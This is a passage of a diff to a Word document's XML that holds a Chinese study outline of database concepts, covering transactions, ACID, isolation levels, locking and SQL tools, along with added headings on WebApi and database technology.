-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>存储引擎</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>事务</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>四大特性</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>(ACID)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>原子性</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Atomicity</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>一致性</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Consistency</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>隔离性</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Isolation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>持续性</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Durability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>并发产生的问题</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>脏读</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>幻读</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>不可重复读</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>解决方案</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>—</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>隔离级别</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>读未提交</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Read uncommitted</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>读已提交</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Read committed (mssql</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>oracle)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>可重复读</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Repeatable read</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>mysql</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="29"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>串行化</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Serializable</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-        <w:ind w:left="900"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:b/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>锁机制</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>种类、粒度、加锁方式</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>悲观锁</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>开销大，避免长事务</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="30"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>表锁、行锁</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>读锁、写锁</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>乐观锁</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>开销小，读大于写</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="31"/>
-        </w:numPr>
-        <w:ind w:left="1800"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Version</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>版本号机制</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-        <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:ind w:left="450"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>数据库辅助工具：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Power Designer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>EZDML</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ER Studio</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Rose</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Microsoft Visio...</w:t>
+          <w:color w:val="02696D"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>WebApi</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12847,15 +13036,1103 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:t>数据库技术</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>数据库服务端、客户端、图形界面管理工具、数据库语言（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>PL-sql,T-sql,sql</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>）、数据库安全等概念</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>视图、存储过程、游标、中间表、触发器、计划任务等常用技术</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="25"/>
+        </w:numPr>
+        <w:ind w:left="450"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
